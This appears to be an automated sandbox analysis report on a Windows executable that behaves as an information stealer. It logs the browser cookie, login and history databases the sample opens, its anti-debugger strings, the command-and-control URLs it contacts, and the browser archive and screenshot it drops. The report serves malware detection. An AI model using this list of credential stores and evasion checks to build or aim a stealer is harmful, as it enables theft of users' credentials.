Source: DmI602ZFyp.exe, 00000000.00000002.2605052081.00007FF7F552C000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: m=nil base hangupkilledlistensocketEscapeReturnInsertDeleteexec: numberdeletesearchfolderuploadlogoutbuttonorangeyellowpurpleerror_Italic%w: %sImage x32dbgvmsrvcprl_ccx96dbgdbgclrde4dotwindbgpc-retx64dbgghidra-ForceattribGetACPCommonArabicBrahmiCarianChakmaCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidirdtscppopcntcmd/gonetdnsRGBA64Gray16activeclosedsocks5CANCELGOAWAYPADDEDBasic CookieacceptcookieexpectoriginserverExpectPragmasocks Locked%s: %s, val normalradiussimple\u0000\u0001\u0002\u0003\u0004\u0005\u0006\u0007\u000b\u000e\u000f\u0010\u0011\u0012\u0013\u0014\u0015\u0016\u0017\u0018\u0019\u001a\u001b\u001c\u001d\u001e\u001f\u007ftoml: \"""""KeyEndGetAcesendtoMarkerOffsetfile[]NumbersqliteChromeChedotKometaFenrirCoowonLiebaoDragonCocCocYandexVideos

Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\ls-archive.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\protections.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\permissions.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\to-be-removed	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionstore-backups	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\favicons.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\webappsstore.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\signons.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\Default\AppData\Roaming\8pecxstudios\Cyberfox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\content-prefs.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\bookmarkbackups	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\signons.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\minidumps	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\Public\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\crashes\events	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\events	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\webappsstore.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\Public\AppData\Roaming\8pecxstudios\Cyberfox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\security_state	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.files	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\crashes	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\favicons.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\webappsstore.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\Default\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\tmp	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\favicons.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\db	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite	Jump to behavior

Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Directory queried: C:\Users\Default\Documents	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Directory queried: C:\Users\Default\Documents	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Directory queried: C:\Users\Public\Documents	Jump to behavior

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States		53334	TUT-ASUS	false
51.210.106.44	b.tundara.dev	France		16276	OVHFR	false

Windows Analysis Report DmI602ZFyp.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
DmI602ZFyp.exe

Name	IP	Active
b.tundara.dev	51.210.106.44	true
ip-api.com	208.95.112.1	true
w.tundara.dev	51.210.106.44	true

Name	Malicious	Antivirus Detection	Reputation
https://w.tundara.dev/ws?id=ZWM6ZjQ6YmI6MmQ6MjQ6OTY0RDgwMjc0Mi0zMDk5LTlDMEUtQzE5Qi0yQTIzRUExRkM0MjA=	false	Avira URL Cloud: safe	unknown
http://ip-api.com/json/	false		high
https://b.tundara.dev/tapped/66d82f8e-64e7-4a18-aa38-b985b61ff00d/ZWM6ZjQ6YmI6MmQ6MjQ6OTY0RDgwMjc0Mi0zMDk5LTlDMEUtQzE5Qi0yQTIzRUExRkM0MjA=	false	Avira URL Cloud: safe	unknown

ID:	1563093
Product:	CloudBasic
Start time:	13:57:06
Start date:	26.11.2024
Sample:	DmI602ZFyp.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	b719f5289acdec0fe628bf670e5b0996
SHA1:	8ea3332a38ec88aae2a77b463cc4eac8631e3912
SHA256:	3b5fd2faa64b735197087df255850740bf87a2f7ee1f7ede61ff7bec4f04d89f
Filetype:	Win64 Executable (generic) (12005/4) 74.95%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	446DD1CF97EABA21CF14D03AEBC79F27	36E4CC7367E0C7B40F4A8ACE272941EA46373799	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1b51ttgc.mow.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ekgadya.0cx.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3p1cppwe.01t.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ubkveeo.d2p.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dx4htymv.urv.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vsuntrpb.n10.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yrhfnen1.1sn.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zm0vtbeh.nj5.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\browsers-temp\user\Chrome\Default\cookies.txt	ASCII text	021CBD2DCACB59433DD928535BCF95BE	2EEFDA675FAC0016B8EDC6B82825848761158CB2	5C81F2EAF4AB183E201987FF4C6253F0C540898E9E7073BD0C7762143904BCE6
C:\Users\user\AppData\Local\Temp\cerbfyne-user-PC-8.46.123.75-Browser.zip	Zip archive data, at least v2.0 to extract, compression method=deflate	280B743BA8C1D6DCB9E32ABCA0DC0D2F	7CED09CDDFE94C573D26E92702D368382A6EE9BD	D6F37B67CD5FF0D2BA3CEE4AFC3AF90689C7748AAC85C28F30E3FF92AAE54497
C:\Users\user\AppData\Local\Temp\logs-temp\cerblogs.log	ASCII text, with very long lines (60020)	E216B6E2C3019DED78003918040D6627	BBB91071118A69687C1C9C94E685BC1BB6CECAC1	2CF7C3BAC8403B307A13EAEB974457BEFE75A98BBAF0EA42E7083CAB4F753066
C:\Users\user\Desktop\screenshot_0.png	PNG image data, 1280 x 1024, 8-bit/color RGB, non-interlaced	E95223B8802A62E99F5BC24D16E32A6E	935A5184B1FD153A76D153A3C318E2923D4DF37C	ECF061387AF36D7A8CE1BC3E46D8AA20FD669FD9A09144E8BE84ABBD3EE57B17
C:\Windows\System32\drivers\etc\hosts	ASCII text, with CRLF, LF line terminators	BD87D7EA7B5DBD74CC0B0E38477F6079	63C28862A5D0052F2425A8B45AC0F66572A02F33	EB97F9588DFFD94BC3B06EAED77751593F32F9E0D09A9B7868746AB16E7F45F1
\Device\Null	ASCII text, with CRLF line terminators	DDF93C5AA7B2069E1117B983630A1F84	749D89CBC6E684B8A7269695E85D6B1F0601ADBB	6680489E48D8EBB1D4EDD7A107ADAD044753A70F8F8660B7CFA7A92E28A3967D